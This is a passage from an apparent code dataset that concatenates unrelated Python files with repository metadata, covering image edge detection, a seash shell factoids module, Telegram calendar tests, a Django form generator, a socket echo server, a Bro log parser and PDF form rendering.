[-1, 0, 1],
    [-2, 0, 2],
[-1, 0, 1]
])
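# This kernel approximates the horizontal intensity gradient, so convolving
# with it highlights vertical edges; its transpose (used in the last subplot)
# highlights horizontal edges.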
sobelX = cv2.Sobel(img, -1, 1, 0, ksize=5)
sobelY = cv2.Sobel(img, -1, 0, 1, ksize=5)
subplot(2,2,1)
plt.imshow(sobelX, cmap='gray')
plt.title('(-1, 1, 0)')
subplot(2,2,2)
plt.imshow(sobelY, cmap='gray')
plt.title('(-1, 0, 1)')
subplot(2,2,3)
plt.imshow(filters.convolve(img_as_int(img), sobel_operator_v), cmap='gray')
plt.title('sobel vertical')
subplot(2,2,4)
plt.imshow(filters.convolve(img_as_int(img), sobel_operator_v.T), cmap='gray')
plt.title('sobel horizontal')
plt.show()
| 22.277778 | 79 | 0.649626 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 142 | 0.177057 |
7b4b9aebba4c243de4aa31a177c2640cf3ee6e9d | 199 | py | Python | src/gluonts/model/prophet/__init__.py | rlucas7/gluon-ts | f8572ab4daeb01a05aa88a252bb67ec9062ee150 | [
"Apache-2.0"
]
| null | null | null | src/gluonts/model/prophet/__init__.py | rlucas7/gluon-ts | f8572ab4daeb01a05aa88a252bb67ec9062ee150 | [
"Apache-2.0"
]
| null | null | null | src/gluonts/model/prophet/__init__.py | rlucas7/gluon-ts | f8572ab4daeb01a05aa88a252bb67ec9062ee150 | [
"Apache-2.0"
]
 | null | null | null |
# Relative imports
from ._estimator import ProphetEstimator
from ._predictor import ProphetPredictor, PROPHET_IS_INSTALLED
__all__ = ['ProphetEstimator', 'ProphetPredictor', 'PROPHET_IS_INSTALLED']
| 33.166667 | 74 | 0.834171 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 76 | 0.38191 |
7b4bc6101cb34fe0e28e691b6f51e4ac042ddfb6 | 4,995 | py | Python | DEPENDENCIES/seash/modules/factoids/__init__.py | kevinkenzhao/Repy2 | a7afb4c8ba263c8a74775a6281a50d94880a8d34 | [
"MIT"
]
| null | null | null | DEPENDENCIES/seash/modules/factoids/__init__.py | kevinkenzhao/Repy2 | a7afb4c8ba263c8a74775a6281a50d94880a8d34 | [
"MIT"
]
| null | null | null | DEPENDENCIES/seash/modules/factoids/__init__.py | kevinkenzhao/Repy2 | a7afb4c8ba263c8a74775a6281a50d94880a8d34 | [
"MIT"
]
| null | null | null | """
<Filename>
factoids/__init__.py
<Purpose>
  Used to print seash factoids.
It implements the following command:
show factoids [number of factoids]/all
"""
import seash_exceptions
import random
import os
# List which will contain all factoids after fetching them from a file.
factoids = []
def initialize():
"""
<Purpose>
Used to print random seash factoid when user runs seash.
<Arguments>
None
<Side Effects>
Prints random factoid onto the screen.
<Exceptions>
UserError: Error during generating path to "factoid.txt" file or
Error while opening, reading or closing "factoid.txt" file.
<Return>
None
"""
# Global 'factoids' list will be used to store factoids, fetched from a file.
global factoids
# Path to "factoid.txt" file is created.
try:
current_path = os.getcwd()
file_path = os.path.join(current_path, "modules", "factoids", "factoid.txt")
except OSError, error:
raise seash_exceptions.InitializeError("Error during initializing factoids module: '" + str(error) + "'.")
  # Fetch the list of factoids from the "factoid.txt" file.
try:
file_object = open(file_path, 'r')
factoids_temp = file_object.readlines()
file_object.close()
except IOError, error:
raise seash_exceptions.InitializeError("Error during initializing factoids module: '" + str(error) + "'.")
  # Newline characters are stripped from each line read from the file.
for factoid in factoids_temp:
factoids.append(factoid.strip('\n'))
# A random factoid is printed every time user runs seash.
print random.choice(factoids)+"\n"
def cleanup():
"""
<Purpose>
Used to clean 'factoids' list when this module is going to be disabled.
<Arguments>
None
<Side Effects>
None
<Exceptions>
None
<Return>
None
"""
# Data from a global 'factoids' list will be removed.
global factoids
factoids = []
def print_factoids(input_dict, environment_dict):
"""
<Purpose>
Used to print seash factoids when user uses 'show factoids'
command.
<Arguments>
input_dict: Input dictionary generated by seash_dictionary.parse_command().
environment_dict: Dictionary describing the current seash environment.
For more information, see command_callbacks.py's module docstring.
<Side Effects>
Prints factoids onto the screen.
<Exceptions>
UserError: If user does not type appropriate command.
ValueError: If user does not provide valid input (integer).
<Return>
None
"""
  # The user passes an argument saying how many factoids should be printed.
  # We have to find that argument.
  # It can be any positive number, or 'all' to see all available factoids.
dict_mark = input_dict
try:
command = dict_mark.keys()[0]
while dict_mark[command]['name'] != 'args':
dict_mark = dict_mark[command]['children']
command = dict_mark.keys()[0]
args = command
except IndexError:
raise seash_exceptions.UserError("\nError, Syntax of the command is: show factoids [number of factoids]/all \n")
# User decided to print all factoids
if args == 'all':
print
for factoid in factoids:
print factoid
print
return
  # The user may only enter an integer here.
try:
no_of_factoids = int(args)
except ValueError:
raise seash_exceptions.UserError("\nYou have to enter number only.\n")
  # If the number of factoids requested by the user is greater than the total
  # number of available factoids, then the whole factoids list is printed.
if (no_of_factoids > (len(factoids))):
print "\nWe have only %d factoids. Here is the list of factoids:" % (len(factoids))
no_of_factoids = len(factoids)
elif (no_of_factoids <= 0):
raise seash_exceptions.UserError("\nYou have to enter positive number only.\n")
# 'factoids' list will be shuffled every time for printing random factoids.
random.shuffle(factoids)
# Factoids will be printed.
for factoid in factoids[:no_of_factoids]:
print factoid
print
command_dict = {
'show': {'name':'show', 'callback': None, 'children':{
'factoids':{'name':'factoids', 'callback': print_factoids,
'summary': "Displays available seash factoids.",
'help_text': '','children':{
'[ARGUMENT]':{'name':'args', 'callback': None, 'children':{}}
}},}}
}
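# Example session inside seash (illustrative; the actual factoid text depends
# on the contents of factoid.txt):
#   !> show factoids 2
#   <factoid 1>
#   <factoid 2>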
help_text = """
Factoids Module
This module provides a command that prints seash factoids.
'show factoids [number of factoids]/all' is used to print
available seash factoids.
You can type 'show factoids [number of factoids]' to print
that many factoids.
You can type 'show factoids all' to see all available factoids.
"""
# This is where the module importer loads the module from.
moduledata = {
'command_dict': command_dict,
'help_text': help_text,
'url': None,
'initialize': initialize,
'cleanup': cleanup
}
| 26.289474 | 116 | 0.680881 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,243 | 0.649249 |
7b4d5102e41f930744e5fe944b292c3c7d93fe14 | 2,985 | py | Python | tests/test_detailed.py | TarasRudnyk/python-telegram-bot-calendar | 6bca67e1e4ac1e9cc187d2370ba02a6df9ed60a4 | ["MIT"] | 44 | 2020-08-05T20:19:45.000Z | 2022-03-10T22:29:19.000Z | tests/test_detailed.py | TarasRudnyk/python-telegram-bot-calendar | 6bca67e1e4ac1e9cc187d2370ba02a6df9ed60a4 | ["MIT"] | 6 | 2021-01-08T16:07:24.000Z | 2022-02-15T18:39:51.000Z | tests/test_detailed.py | TarasRudnyk/python-telegram-bot-calendar | 6bca67e1e4ac1e9cc187d2370ba02a6df9ed60a4 | ["MIT"] | 20 | 2020-09-08T16:19:22.000Z | 2022-03-14T15:39:56.000Z |
import json
import os
import sys
from datetime import date
import pytest
from dateutil.relativedelta import relativedelta
from telegram_bot_calendar import DAY, MONTH, YEAR
from telegram_bot_calendar.detailed import DetailedTelegramCalendar, NOTHING
myPath = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, myPath + '/../')
# todo: fix this test to properly check generated keyboard
@pytest.mark.parametrize(('callback_data', 'result', 'key', 'step'),
[('cbcal_0_s_m_2021_11_13_726706365801178150', None, None, DAY),
('cbcal_0_s_d_2021_11_13_726706365801178150', date(2021, 11, 13), None, DAY),
('cbcal_0_s_y_2020_1_1_726702345801178150', None, None, MONTH),
('cbcal_0_n_726702345801178150', None, None, None),
('cbcal_0_g_m_2022_5_7_726702345801178150', None, None, MONTH)])
def test_process(callback_data, result, key, step):
calendar = DetailedTelegramCalendar(current_date=date(2021, 1, 12))
result_, _, step_ = calendar.process(callback_data)
assert result_ == result and step_ == step
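# Callback-data anatomy as exercised above (inferred from these cases, not
# from the library docs): cbcal_<calendar id>_<action>_<step>_<Y>_<M>_<D>_<nonce>,
# where action 's' selects a value, 'g' navigates to a step, and 'n' is a no-op.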
@pytest.mark.parametrize(
('step', 'start', 'diff', 'mind', 'maxd', 'min_button_date', 'max_button_date', 'result_buttons'),
[
(
MONTH, date(2021, 1, 12), relativedelta(months=12), date(2021, 1, 1), date(2021, 3, 2), date(2021, 1, 1),
date(2021, 3, 2),
[{'text': "×", "callback_data": "cbcal_0_n"},
{'text': "2021", "callback_data": "cbcal_0_g_y_2021_1_12"},
{'text': "×", "callback_data": "cbcal_0_n"}]
),
(
MONTH, date(2021, 1, 12), relativedelta(months=12), date(2021, 1, 1), date(2022, 1, 1), date(2021, 1, 1),
date(2021, 12, 1),
[{'text': "×", "callback_data": "cbcal_0_n"},
{'text': "2021", "callback_data": "cbcal_0_g_y_2021_1_12"},
{'text': ">>", "callback_data": "cbcal_0_g_m_2022_1_1"}]
),
(
YEAR, date(2021, 5, 12), relativedelta(years=4), date(2018, 5, 12), date(2023, 5, 12), date(2019, 5, 12),
date(2019, 5, 12),
[{'text': "<<", "callback_data": "cbcal_0_g_y_2017_5_12"},
{'text': " ", "callback_data": "cbcal_0_n"},
{'text': ">>", "callback_data": "cbcal_0_g_y_2025_5_12"}]
)
])
def test__build_nav_buttons(step, start, diff, mind, maxd, min_button_date, max_button_date, result_buttons):
calendar = DetailedTelegramCalendar(current_date=start, min_date=mind, max_date=maxd)
buttons = calendar._build_nav_buttons(step, diff, min_button_date, max_button_date)
result = True
print(buttons[0])
for i, button in enumerate(buttons[0]):
        if button['text'] != result_buttons[i]['text'] or not button['callback_data'].startswith(result_buttons[i]['callback_data']):
result = False
assert result
| 45.923077 | 121 | 0.60536 | 0 | 0 | 0 | 0 | 2,582 | 0.864123 | 0 | 0 | 796 | 0.266399 |
7b4da977c274712fe30edac1bd68cf28ac41017f | 4,964 | py | Python | django_bootstrap_generator/management/commands/generate_bootstrap.py | rapilabs/django-bootstrap-generator | 51bd0ea3eae69c04b856c1df34c5be1a4abc0385 | ["MIT"] | 1 | 2015-03-10T03:41:39.000Z | 2015-03-10T03:41:39.000Z | django_bootstrap_generator/management/commands/generate_bootstrap.py | rapilabs/django-bootstrap-generator | 51bd0ea3eae69c04b856c1df34c5be1a4abc0385 | ["MIT"] | null | null | null | django_bootstrap_generator/management/commands/generate_bootstrap.py | rapilabs/django-bootstrap-generator | 51bd0ea3eae69c04b856c1df34c5be1a4abc0385 | ["MIT"] | null | null | null |
import collections
import types
from optparse import make_option
from django.db.models.loading import get_model
from django.core.management.base import BaseCommand, CommandError
from django.db.models.fields import EmailField, URLField, BooleanField, TextField
def convert(name):
return name.replace('_', ' ').capitalize()
bs_form = """\
<form role="form" class="form-horizontal">
%s\
<div class="form-group">
<div class="col-sm-offset-2 col-sm-10">
<button class="btn btn-primary"><i class="fa fa-save"></i> Save</button>
</div>
</div>
</form>
"""
bs_field = """\
<div class="form-group">
<label for="%(id)s" class="col-sm-2 control-label">%(label)s</label>
<div class="col-sm-10">
%(field)s%(error)s
</div>
</div>
"""
bs_input = """\
<input type="%(input_type)s" %(name_attr)s="%(name)s"%(class)s id="%(id)s"%(extra)s/>"""
bs_select = """\
<select %(name_attr)s="%(name)s" class="form-control" id="%(id)s"%(extra)s>%(options)s
</select>"""
bs_option = """
<option value="%(value)s">%(label)s</option>"""
optgroup = """
<optgroup label="%(label)s">%(options)s
</optgroup>"""
bs_textarea = """\
<textarea %(name_attr)s="%(name)s" class="form-control" id="%(id)s"%(extra)s></textarea>"""
react_error = """
{errors.%(name)s}"""
def format_choice(key, val):
if isinstance(val, collections.Iterable) and not isinstance(val, types.StringTypes):
return optgroup % {
'label': key,
'options': ''.join([bs_option % {'value': value, 'label': label} for value, label in val])
}
else:
return bs_option % {'value': key, 'label': val}
def format_bs_field(model_name, field, flavour):
field_id_html = model_name + '-' + field.name
if flavour == 'react':
name_attr = 'ref'
if isinstance(field, BooleanField):
extra = ' defaultChecked={this.state.data.' + field.name + '}'
else:
extra = ' defaultValue={this.state.data.' + field.name + '}'
else:
name_attr = 'name'
extra = ''
if field.choices:
field_html = bs_select % {
'id': field_id_html,
'options': "".join([format_choice(value, label) for value, label in field.choices]),
'name': field.name,
'name_attr': name_attr,
'extra': extra,
}
elif isinstance(field, TextField):
field_html = bs_textarea % {
'id': field_id_html,
'name': field.name,
'name_attr': name_attr,
'extra': extra,
}
else:
if isinstance(field, EmailField):
input_type = 'email'
class_fullstr = ' class="form-control"'
elif isinstance(field, URLField):
input_type = 'url'
class_fullstr = ' class="form-control"'
elif isinstance(field, BooleanField):
input_type = 'checkbox'
class_fullstr = ''
else:
input_type = 'text'
class_fullstr = ' class="form-control"'
field_html = bs_input % {
'id': field_id_html,
'input_type': input_type,
'name_attr': name_attr,
'name': field.name,
'class': class_fullstr,
'extra': extra,
}
if flavour == 'react':
error = react_error % {
'name': field.name,
}
else:
error = ''
rendered_html = bs_field % {
'id': field_id_html,
'label': convert(field.name),
'field': field_html,
'error': error,
}
if flavour == 'react':
rendered_html = rendered_html.replace('class="col-sm-10"', 'class={"col-sm-10 " + errorClasses.' + field.name + '}')
return rendered_html
def format_bs_form(fields, flavour):
rendered_html = bs_form % fields
if flavour == 'react':
rendered_html = rendered_html.replace('class=', 'className='). \
replace('for=', 'htmlFor=')
return rendered_html
class Command(BaseCommand):
args = '<app_name> <model_name>'
help = 'Prints a bootstrap form for the supplied app & model'
option_list = BaseCommand.option_list + (
make_option('--react',
action='store_true',
dest='react',
default=False,
help='Generate with React\'s ref and defaultValue attributes'),
)
def handle(self, *args, **options):
if len(args) != 2:
raise CommandError('Please supply an app name & model name')
app_name = args[0]
model_name = args[1]
if options['react']:
flavour = 'react'
else:
flavour = None
model_class = get_model(app_name, model_name)
fields = [format_bs_field(model_name, field, flavour) for field in model_class._meta.fields if field.name != 'id']
self.stdout.write(format_bs_form("".join(fields), flavour))
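# Example invocation (hypothetical app/model names; the HTML is written to stdout):
#   python manage.py generate_bootstrap blog Article
#   python manage.py generate_bootstrap blog Article --react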
| 29.724551 | 124 | 0.567889 | 924 | 0.18614 | 0 | 0 | 0 | 0 | 0 | 0 | 1,622 | 0.326753 |
7b50d8a97e5f0d3cb0ea0a3693bd90b984964582 | 291 | py | Python | logical/__init__.py | reity/logical | 476193949311824cd63bd9e279a223bcfdceb2e2 | ["MIT"] | null | null | null | logical/__init__.py | reity/logical | 476193949311824cd63bd9e279a223bcfdceb2e2 | ["MIT"] | null | null | null | logical/__init__.py | reity/logical | 476193949311824cd63bd9e279a223bcfdceb2e2 | ["MIT"] | null | null | null |
"""Gives users direct access to the class and functions."""
from logical.logical import\
logical,\
nullary, unary, binary, every,\
nf_, nt_,\
uf_, id_, not_, ut_,\
bf_,\
and_, nimp_, fst_, nif_, snd_, xor_, or_,\
nor_, xnor_, nsnd_, if_, nfst_, imp_, nand_,\
bt_
| 26.454545 | 55 | 0.61512 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 55 | 0.189003 |
7b51df476a25eb10705b2313609ccd9bca295e46 | 1,667 | py | Python | lab_15/server/main.py | MrLuckUA/python_course | 50a87bc54550aedaac3afcce5b8b5c132fb6ec98 | ["MIT"] | null | null | null | lab_15/server/main.py | MrLuckUA/python_course | 50a87bc54550aedaac3afcce5b8b5c132fb6ec98 | ["MIT"] | null | null | null | lab_15/server/main.py | MrLuckUA/python_course | 50a87bc54550aedaac3afcce5b8b5c132fb6ec98 | ["MIT"] | null | null | null |
import queue
import select
import socket
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setblocking(False)
server.bind(('localhost', 9999))
server.listen(5)
inputs = [server]
outputs = []
message_queues = {}
while inputs:
readable, writable, exceptional = select.select(
inputs, outputs, inputs)
for s in readable:
if s is server:
connection, client_address = s.accept()
connection.setblocking(0)
inputs.append(connection)
message_queues[connection] = queue.Queue()
else:
data = s.recv(1024)
if data:
message_queues[s].put(data)
if s not in outputs:
outputs.append(s)
else:
if s in outputs:
outputs.remove(s)
inputs.remove(s)
s.close()
del message_queues[s]
for s in writable:
try:
next_msg = message_queues[s].get_nowait()
except queue.Empty:
outputs.remove(s)
else:
s.send(next_msg)
for s in exceptional:
inputs.remove(s)
if s in outputs:
outputs.remove(s)
s.close()
del message_queues[s]
# import socket
#
# server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# server.bind(('localhost', 9999))
# server.listen(1)
# while True:
# client_socket, addr = server.accept()
# print(f'New connection from {addr}')
# client_socket.send('Hello there, how are you?'.encode('utf-8'))
# answer = client_socket.recv(1024)
# print(answer)
# client_socket.close()
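# A minimal client sketch for exercising the select-based echo server above
# (assumes the server is already listening on localhost:9999):
#
# import socket
#
# client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# client.connect(('localhost', 9999))
# client.send('ping'.encode('utf-8'))
# print(client.recv(1024))
# client.close()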
| 26.887097 | 69 | 0.574685 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 387 | 0.232154 |
7b51e80ec38fe59135b07b0729fc19b2c432fc68 | 1,118 | py | Python | febraban/cnab240/itau/sispag/payment/transfer.py | netosjb/febraban-python | a546fa3353d2db1546df60f6f8cc26c7c862c743 | ["MIT"] | 7 | 2019-07-16T11:31:50.000Z | 2019-07-29T19:49:50.000Z | febraban/cnab240/itau/sispag/payment/transfer.py | netosjb/febraban-python | a546fa3353d2db1546df60f6f8cc26c7c862c743 | ["MIT"] | 4 | 2020-05-07T15:34:21.000Z | 2020-11-12T21:09:34.000Z | febraban/cnab240/itau/sispag/payment/transfer.py | netosjb/febraban-python | a546fa3353d2db1546df60f6f8cc26c7c862c743 | ["MIT"] | 6 | 2019-12-04T00:40:10.000Z | 2020-11-05T18:39:40.000Z |
from .segmentA import SegmentA
class Transfer:
def __init__(self):
self.segmentA = SegmentA()
def toString(self):
return self.segmentA.content
def amountInCents(self):
return self.segmentA.amountInCents()
def setSender(self, user):
self.segmentA.setSenderBank(user.bank)
def setReceiver(self, user):
self.segmentA.setReceiver(user)
self.segmentA.setReceiverBank(user.bank)
def setAmountInCents(self, value):
self.segmentA.setAmountInCents(value)
def setPositionInLot(self, index):
self.segmentA.setPositionInLot(index)
def setLot(self, lot):
self.segmentA.setLot(lot)
def setScheduleDate(self, date):
self.segmentA.setScheduleDate(date)
def setInfo(self, reason="10"):
"""
        This method sets config information in the payment.
Args:
            reason: String - payment reason - "10" = Credito em Conta Corrente (credit to a checking account); see NOTES 26
"""
self.segmentA.setInfo(reason)
def setIdentifier(self, identifier):
self.segmentA.setIdentifier(identifier)
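# Usage sketch (`sender` and `receiver` are hypothetical User objects; see the
# febraban-python README for how to construct them):
#   transfer = Transfer()
#   transfer.setSender(sender)
#   transfer.setReceiver(receiver)
#   transfer.setAmountInCents(100000)  # R$ 1,000.00
#   transfer.setPositionInLot(1)
#   line = transfer.toString()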
| 24.844444 | 91 | 0.658318 | 1,084 | 0.969589 | 0 | 0 | 0 | 0 | 0 | 0 | 184 | 0.16458 |
7b53b8e74efe57ed1e451add7d928562719e4e93 | 4,689 | py | Python | BroLog.py | jcwoods/BroLog | b95c91178d4038d1e363cb8c8ef9ecc64a23193f | ["MIT"] | null | null | null | BroLog.py | jcwoods/BroLog | b95c91178d4038d1e363cb8c8ef9ecc64a23193f | ["MIT"] | null | null | null | BroLog.py | jcwoods/BroLog | b95c91178d4038d1e363cb8c8ef9ecc64a23193f | ["MIT"] | null | null | null |
#!/usr/bin/python
import sys
import codecs
import ipaddress as ip
import pandas as pd
from datetime import datetime as dt
class BroLogFile:
def doSeparator(self, fields):
sep = fields[1]
if len(sep) == 1: # a literal?
self.separator = sep
elif sep[:2] == '\\x': # a hexadecimal (ASCII) value?
self.separator = chr(int(sep[2:], 16))
else:
raise ValueError('invalid separator format in log file')
return
def default_transform(self, fields):
ntypes = len(self.field_types)
for fno in range(ntypes):
if fields[fno] == self.unset_field:
fields[fno] = None
continue
elif fields[fno] == self.empty_field:
fields[fno] = ''
continue
elif self.field_types[fno] == 'count' or self.field_types[fno] == 'port':
try:
val = int(fields[fno])
fields[fno] = val
except:
pass
elif self.field_types[fno] == 'interval':
try:
val = float(fields[fno])
fields[fno] = val
except:
pass
#elif self.field_types[fno] == 'addr':
# try:
# ip_addr = ip.ip_address(fields[fno])
# fields[fno] = int(ip_addr)
# except ValueError:
# # IPv6 address? TBD...
# fields[fno] = 0
elif self.field_types[fno] == 'time':
ts = float(fields[fno])
t = dt.fromtimestamp(ts).isoformat()
fields[fno] = t
return
def __init__(self, fname, row_transform = None, row_filter = None):
"""
        Create a new Pandas DataFrame from the given file.
        fname is the name of the file to be opened.
        row_transform is an (optional) function which will be applied
        to each row as it is read. It may modify the individual column
        values, such as by performing integer conversions on expected
        numeric fields. This function does not return a value.
row_filter is an (optional) function which will be used to test each
input row. It is executed after row_transform (if one exists),
and must return a boolean value. If True, the row will be
included in the result. If False, the row will be suppressed.
May generate an exception if the file could not be opened or if an
invalid format is found in the separator value.
"""
self.row_transform = row_transform
self.row_filter = row_filter
self.field_names = []
self.field_types = []
self.empty_field = '(empty)'
self.unset_field = '-'
self.set_separator = ','
self.separator = ' '
self.rows = []
self.field_map = None
#f = file(fname, 'r')
f = codecs.open(fname, 'r', encoding = 'utf-8')
line = f.readline()
while line[0] == '#':
fields = line[1:].strip().split(self.separator)
if fields[0] == 'separator':
self.doSeparator(fields)
elif fields[0] == 'empty_field':
self.empty_field = fields[1]
elif fields[0] == 'unset_field':
self.unset_field = fields[1]
elif fields[0] == 'fields':
self.field_names = fields[1:]
elif fields[0] == 'types':
self.field_types = fields[1:]
line = f.readline()
for line in f:
if line[0] == '#': continue
fields = line.rstrip("\r\n").split(self.separator)
if self.row_transform is not None:
self.row_transform(fields)
else:
self.default_transform(fields)
if self.row_filter is not None:
if self.row_filter(fields, self.field_types, self.field_names) is False: continue
self.rows.append(fields)
return
def asDataFrame(self):
df = pd.DataFrame(self.rows, columns = self.field_names)
return df
def __len__(self):
return len(self.rows)
def conn_filter(fields, types, names):
return fields[6] == 'tcp'
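# Example: keep only TCP rows while loading a Zeek/Bro conn.log (a sketch;
# conn_filter above assumes the protocol lives in column 6 of each row):
#   tcp_only = BroLogFile('conn.log', row_filter = conn_filter)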
def main(argv):
con = BroLogFile(argv[1])
#for n in range(10):
# print(con.rows[n])
df = con.asDataFrame()
print(df.head(10))
print(df.describe())
return 0
if __name__ == "__main__":
sys.exit(main(sys.argv))
| 28.591463 | 97 | 0.527831 | 4,241 | 0.904457 | 0 | 0 | 0 | 0 | 0 | 0 | 1,379 | 0.294093 |
7b53fdee739e7f6188764d53517bc20b22165406 | 8,288 | py | Python | test_pdf.py | ioggstream/json-forms-pdf | 9f18cf239ae892ebb0018bfd4a8f792af35ccfac | ["BSD-3-Clause"] | 2 | 2020-06-18T13:31:32.000Z | 2022-02-21T08:30:37.000Z | test_pdf.py | ioggstream/json-forms-pdf | 9f18cf239ae892ebb0018bfd4a8f792af35ccfac | ["BSD-3-Clause"] | 2 | 2020-05-25T17:31:52.000Z | 2020-06-23T17:32:03.000Z | test_pdf.py | ioggstream/json-forms-pdf | 9f18cf239ae892ebb0018bfd4a8f792af35ccfac | ["BSD-3-Clause"] | null | null | null |
# simple_checkboxes.py
import logging
from os.path import basename
from pathlib import Path
import jsonschema
import pytest
# from reportlab.pdfbase import pdfform
import yaml
from reportlab.pdfgen import canvas
uischema = yaml.safe_load(Path("jsonforms-react-seed/src/uischema.json").read_text())
form_schema = yaml.safe_load(Path("jsonforms-react-seed/src/schema.json").read_text())
form_fields = jsonschema.RefResolver.from_schema(form_schema)
log = logging.getLogger()
logging.basicConfig(level=logging.DEBUG)
DATA = {
"name": "foo",
"description": "Confirm if you have passed the subject\nHereby ...",
"done": True,
"recurrence": "Daily",
"rating": "3",
"due_date": "2020-05-21",
"recurrence_interval": 421,
}
def localize_date(date_string):
try:
from dateutil.parser import parse as dateparse
import locale
locale.nl_langinfo(locale.D_FMT)
d = dateparse(date_string)
return d.strftime(locale.nl_langinfo(locale.D_FMT))
except:
return date_string
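# e.g. localize_date("2020-05-21") -> "05/21/2020" under an en_US locale; the
# exact rendering depends on the active LC_TIME setting, and the input string
# is returned unchanged whenever parsing or the locale lookup fails.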
def csetup(name, font_size=12):
c = canvas.Canvas(f"{name}.pdf")
c.setFont("Courier", font_size)
return c
class FormRender(object):
def __init__(self, ui, schema, font_size=11, font_size_form=None, data=DATA):
"""
:param ui: object containing ui-schema
:param schema: structure containing the schema
"""
self.ui = ui
self.schema = schema
self.resolver = jsonschema.RefResolver.from_schema(schema)
self.font_size = font_size
self.font_size_form = font_size_form or font_size
self.data = data or {}
self.line_feed = 5 * self.font_size
@staticmethod
def from_file(ui_path, schema_path):
ui = yaml.safe_load(Path(ui_path).read_text())
schema = yaml.safe_load(Path(schema_path).read_text())
return FormRender(ui, schema)
def layout_to_form(self, layout, form, canvas, point):
assert "elements" in layout
x, y = point
if layout["type"] == "Group":
canvas.setFont("Courier", int(self.font_size * 1.5))
canvas.drawString(x, y, layout["label"])
canvas.setFont("Courier", self.font_size)
y -= 2 * self.line_feed
if layout["type"] == "HorizontalLayout":
y -= 10
point = (x, y)
for e in layout["elements"]:
x, y = self.element_to_form(e, form, canvas, (x, y))
if layout["type"] == "HorizontalLayout":
x += 250
y = point[1]
if layout["type"] == "HorizontalLayout":
return point[0], y - self.line_feed
return x, y - self.line_feed
def element_to_form(self, element, form, canvas, point):
x, y = point
if "elements" in element:
return self.layout_to_form(element, form, canvas, (x, y))
assert "type" in element
assert "scope" in element
supported_types = {
"string",
"number",
"integer",
"boolean",
}
schema_url, schema = self.resolver.resolve(element["scope"])
field_type = schema["type"]
if field_type not in supported_types:
raise NotImplementedError(field_type)
property_name = basename(schema_url)
field_label = element.get("label") or labelize(schema_url)
render = self.render_function(form, property_name, schema, self.data)
y -= self.line_feed
        params = {
            "name": schema_url,
            "x": x + self.font_size * len(field_label) // 1.4,
            "y": y,
            "forceBorder": True,
        }
if schema.get("description"):
params.update({"tooltip": schema.get("description")})
canvas.drawString(x, y, field_label)
render(**params)
return x, y
def render_function(self, form, name, schema, data=None):
if schema["type"] in ("integer", "number"):
def _render_number(**params):
params.update(
{
"width": self.font_size_form * 5,
"height": self.font_size_form * 1.5,
}
)
value = data.get(name)
if value:
params.update(
{"value": str(value), "borderStyle": "inset",}
)
return form.textfield(**params)
return _render_number
if "enum" in schema:
def _render_enum(**params):
options = [(x,) for x in schema["enum"]]
params.update({"options": options, "value": schema["enum"][0]})
return form.choice(**params)
# return _render_enum
def _render_enum_2(**params):
x, y = params["x"], params["y"]
for v in schema["enum"]:
form.radio(
name=name,
tooltip="TODO",
value=v,
selected=False,
x=x,
y=y,
size=self.font_size_form,
buttonStyle="check",
borderStyle="solid",
shape="square",
forceBorder=True,
)
form.canv.drawString(x + self.font_size_form * 2, y, v)
x += self.font_size * len(v)
return params["x"], y
return _render_enum_2
if schema["type"] == "boolean":
def _render_bool(**params):
params.update(
{
"buttonStyle": "check",
"size": self.font_size_form,
"shape": "square",
}
)
if data.get(name):
params.update({"checked": "true"})
return form.checkbox(**params)
return _render_bool
def _render_string(**params):
value = data.get(name) or schema.get("default")
params.update(
{
"width": self.font_size_form * 10,
"height": self.font_size_form * 1.5,
"fontSize": self.font_size_form,
"borderStyle": "inset",
}
)
if schema.get("format", "").startswith("date"):
params.update(
{"width": self.font_size_form * 8,}
)
if value:
if schema.get("format", "").startswith("date"):
value = localize_date(value)
params.update({"value": value})
return form.textfield(**params)
return _render_string
def labelize(s):
return basename(s).replace("_", " ").capitalize()
def test_get_fields():
import PyPDF2
f = PyPDF2.PdfFileReader("simple.pdf")
ff = f.getFields()
assert "#/properties/given_name" in ff
@pytest.fixture(scope="module", params=["group", "simple"])
def harn_form_render(request):
label = request.param
log.warning("Run test with, %r", label)
fr = FormRender.from_file(f"data/ui-{label}.json", f"data/schema-{label}.json")
canvas = csetup(label)
return fr, canvas
def test_group(harn_form_render):
point = (0, 800)
fr, canvas = harn_form_render
layout = fr.ui
fr.layout_to_form(layout, canvas.acroForm, canvas, point)
canvas.save()
def test_text():
c = canvas.Canvas("form.pdf")
c.setFont("Courier", 12)
c.drawCentredString(300, 700, "Pets")
c.setFont("Courier", 11)
form = c.acroForm
x, y = 110, 645
for v in "inizio cessazione talpazione donazione".split():
form.radio(
name="radio1",
tooltip="Field radio1",
value=v,
selected=False,
x=x,
y=y,
buttonStyle="check",
borderStyle="solid",
shape="square",
forceBorder=True,
)
c.drawString(x + 11 * 2, y, v)
x += 11 * len(v)
c.save()
| 30.358974 | 86 | 0.527389 | 5,770 | 0.696187 | 0 | 0 | 503 | 0.06069 | 0 | 0 | 1,290 | 0.155647 |
7b549c8cf31113881352739cc51b8f9b8d3428b5 | 701 | py | Python | pos_map.py | olzama/neural-supertagging | 340a9b3eaf6427e5ec475cd03bc6f4b3d4891ba4 | ["MIT"] | null | null | null | pos_map.py | olzama/neural-supertagging | 340a9b3eaf6427e5ec475cd03bc6f4b3d4891ba4 | ["MIT"] | null | null | null | pos_map.py | olzama/neural-supertagging | 340a9b3eaf6427e5ec475cd03bc6f4b3d4891ba4 | ["MIT"] | null | null | null |
'''
Assuming the following tab-separated format:
VBP+RB VBP
VBZ+RB VBZ
IN+DT IN
(etc.)
'''
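# Usage sketch (hypothetical mapping file in the format above):
#   mapper = Pos_mapper('pos_map.tsv')
#   mapper.map_tag('VBP+RB')  # -> 'VBP' if mapped, else the first sub-tag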
class Pos_mapper:
def __init__(self, filepath):
with open(filepath,'r') as f:
lines = f.readlines()
self.pos_map = {}
self.unknowns = []
for ln in lines:
if ln:
tag,mapping = ln.strip().split('\t')
self.pos_map[tag] = mapping
def map_tag(self,tag):
if tag in self.pos_map:
return self.pos_map[tag]
else:
#return the first tag
self.unknowns.append(tag)
#print('Unknown POS tag: ' + tag)
tags = tag.split('+')
            return tags[0]
